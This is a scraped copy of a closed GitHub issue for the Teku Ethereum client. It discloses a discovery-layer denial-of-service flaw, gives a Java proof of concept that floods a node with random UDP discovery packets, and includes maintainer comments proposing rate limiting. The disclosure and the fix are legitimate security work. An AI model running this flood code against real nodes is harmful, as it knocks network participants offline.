question-mark
Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

Another discovery attack

See original GitHub issue

Description

Continuation to #2648 and https://github.com/ethereum/public-attacknets/issues/16: Extensively sending well formed RandomPackets with random data results in high CPU and GC pressure to Teku instance:

Below only the discovery attack loads CPU: изображение

Additionally it causes mem leak in Discovery: in unlimitly populates NodeToIdSession.recentSessions map: https://github.com/PegaSysEng/discovery/blob/b45fe1495b8e91c7ec2dfe806bca8f979f290435/src/main/java/org/ethereum/beacon/discovery/pipeline/handler/NodeIdToSession.java#L46

Attack code:

  void dos() throws Exception {
    String host = "localhost";
    int port = 9001; //Random Port

    InetAddress address = InetAddress.getByName(host);

    System.out.println("Attacking...");

    for (int j = 0; j < 100000; j++) {
      DatagramSocket dsocket = null;
      int srcPort = 10000 + (j % 50000);
      try {
        dsocket = new DatagramSocket(srcPort);
        for (int i = 0; i < 1000; i++) {

          RandomPacket randomPacket =
              RandomPacket.create(Bytes32.random(), Bytes.random(12), Bytes.random(44));

          Bytes randomPacketBytes = randomPacket.getBytes();
  //        Bytes randomPacketBytes = Bytes.random(88);
          DatagramPacket packet =
              new DatagramPacket(
                  randomPacketBytes.toArrayUnsafe(), randomPacketBytes.size(), address, port);
          dsocket.send(packet);
        }
        dsocket.close();
      } catch (Exception e) {
        System.out.println("Err opening socket on port " + srcPort + ": " + e);
      }
      Thread.sleep(1);
      System.out.println("Sent from " + srcPort);
    }
    System.out.println("Completed.");
  }

Issue Analytics

  • State:closed
  • Created 3 years ago
  • Reactions:1
  • Comments:7 (6 by maintainers)

github_iconTop GitHub Comments

1reaction
mkalinincommented, Sep 10, 2020

I agree with @jrhea. It would be enough to limit all incoming discovery traffic to mitigate DoS. I think there is no need in randomizing the queue, requests over the limit should be discarded instead and when limiting counter is reset client should continue processing; it looks good enough it terms of randomness in this particular case.

So, it’s gonna be pretty simple throttle mechanism that sets a flag if counter hits the limit and resets it when new request goes beyond some interval (interval could be less than a second actually).

0reactions
cemozerrcommented, Jan 6, 2021

Closed via #3437

Read more comments on GitHub >

github_iconTop Results From Across the Web

Discovered attack - Wikipedia
In chess, a discovered attack is a direct attack revealed when one piece moves out of the way of another. Discovered attacks can...
Read more >
Discovered Attack - Chess Terms
A discovered attack happens when a player moves one piece out of the way to reveal a previously blocked attack by another piece....
Read more >
Introduction to Chess Tactics: Discovered attack
A discovered attack occurs when a piece moves to reveal an attack by a second piece. If the attack is check, this is...
Read more >
Chess 101: What Is A Discovered Attack? Learn Why ...
The idea behind discovered attacks is pretty straightforward: it occurs when moving one piece creates an attack for another piece.
Read more >
Discovered Attacks - Lichess.org
A Discovered Attack is an attack that is revealed when one piece moves out of the way of another. Discovered Attacks can be...
Read more >

github_iconTop Related Medium Post

No results found

github_iconTop Related StackOverflow Question

No results found

github_iconTroubleshoot Live Code

Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free

github_iconTop Related Reddit Thread

No results found

github_iconTop Related Hackernoon Post

No results found

github_iconTop Related Tweet

No results found

github_iconTop Related Dev.to Post

No results found

github_iconTop Related Hashnode Post

No results found